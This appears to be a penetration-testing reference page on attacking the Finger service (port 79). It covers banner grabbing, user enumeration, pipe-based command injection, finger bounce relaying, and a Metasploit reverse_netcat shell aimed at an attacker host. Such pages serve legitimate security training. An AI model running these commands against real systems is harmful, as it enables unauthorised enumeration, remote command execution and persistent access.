Finger - Port 79

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁
Follow us on Twitter @VeryLazyTech, Github @VeryLazyTech, and Medium @VeryLazyTech.
Visit our shop for e-books and courses. 📚
Support us and buy me a coffee. ☕

Basic Information

The Finger protocol is designed to provide details about users on a system. This includes information such as login names, full names, office locations, phone numbers, idle times, last mail read, and content of user project files. Despite its legitimate use, it’s a high-value target for attackers due to its unauthenticated access and support for remote queries.

Default Port: 79

The service’s vulnerability to user enumeration and its ability to run shell commands make it dangerous when exposed to the public internet or used without appropriate security measures.

Attacker Workflow

Reconnaissance (Banner Grabbing)

Identify if the Finger protocol is running and gather system and user information through simple banner grabbing or finger @target requests.

Enumeration (Gathering User Information)

Use finger-user-enum.pl, Nmap, or Metasploit to enumerate user accounts on the system, including service accounts and administrative users.

Exploitation (Command Injection)

If vulnerable, inject system commands using the Finger protocol to execute code remotely. Combine this with Metasploit for reverse shell payloads or custom scripts for command execution.

Lateral Movement (Finger Bounce)

Use the Finger bounce attack to pivot between systems, moving from the external-facing machine to internal, protected machines.

Post-Exploitation (System Access and Persistence)

Once inside, attackers can escalate privileges and establish persistence, such as modifying .bashrc files or uploading backdoors using file-transfer utilities (e.g., SCP).

Banner Grabbing and Basic Connection

Banner grabbing is the first step to identify if the Finger service is running and what version is in use. By connecting to the port and sending specific queries, you can glean information about the users and potentially vulnerable system details.

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

nmap -sV -p 79 --script=banner <target>

What to Look For:

Operating system versions.
Finger daemon versions (older or custom versions could be susceptible to additional vulnerabilities, such as remote command execution).

User Enumeration (Finding Users)

User enumeration is one of the most common techniques to exploit the Finger protocol. You can attempt to gather information about system users, which can then be leveraged in brute-force password attacks, social engineering, or privilege escalation.

finger @<Victim_IP>           # List all users on the system
finger admin@<Victim_IP>      # Get info of a specific user
finger user@<Victim_IP>       # Get info of a specific user

PentestMonkey’s finger-user-enum.pl: A powerful Perl-based enumeration tool that can test multiple users and targets at once.

finger-user-enum.pl -U users.txt -t <Victim_IP>
finger-user-enum.pl -u root -t <Victim_IP>
finger-user-enum.pl -U users.txt -T ips.txt

Metasploit’s Finger Enumeration Module:

use auxiliary/scanner/finger/finger_users
set RHOSTS <Victim_IP>
set USER_FILE <path_to_user_file>
run

Nmap’s finger script:

nmap -p 79 --script finger <target>

Remote Command Execution

Advanced hackers can exploit weaknesses in some Finger service implementations that allow command injection. This vulnerability allows you to execute system commands by crafting specific requests to the Finger service.

finger "|/bin/id@example.com"    # Execute the 'id' command to check user privileges
finger "|/bin/ls -a /@example.com"  # Execute the 'ls' command to list directories

If the Finger service allows piping to system commands (due to poor input sanitization), you can run arbitrary commands on the victim machine.

Metasploit Module (Custom Payloads): An attacker could modify the auxiliary/scanner/finger/finger_users module to include shell injection payloads, exploiting the command execution vulnerability in real time.

use auxiliary/scanner/finger/finger_users
set RHOSTS <Victim_IP>
set PAYLOAD cmd/unix/reverse_netcat
set LHOST <Attacker_IP>
set LPORT 4444
exploit

Finger Bounce (Relaying Requests)

The Finger bounce attack is an interesting lateral movement technique that involves using the Finger service on one host to query another host. In this case, you can pivot from a compromised system to target an internal machine behind a firewall, leveraging the compromised host as a relay for the Finger query.

finger user@host@victim    # Send a Finger request to the internal machine through an intermediate compromised host.
finger @internal@external  # Another format for bouncing the query.

Finger Misconfigurations and Supply Chain Attacks

Access to Plan Files: Finger sometimes provides access to user-specific plan and project files, which might include sensitive information such as project timelines, confidential documents, or even credentials.

Common Vulnerabilities

CVE-1999-0601: Finger service is enabled, allowing remote users to enumerate valid users on the system, exposing the system to brute force or privilege escalation attacks.

PreviousTFTP/Bittorrent-tracker - Port 69/UDP NextWeb - Port 80,443

Last updated 8 months ago

Was this helpful?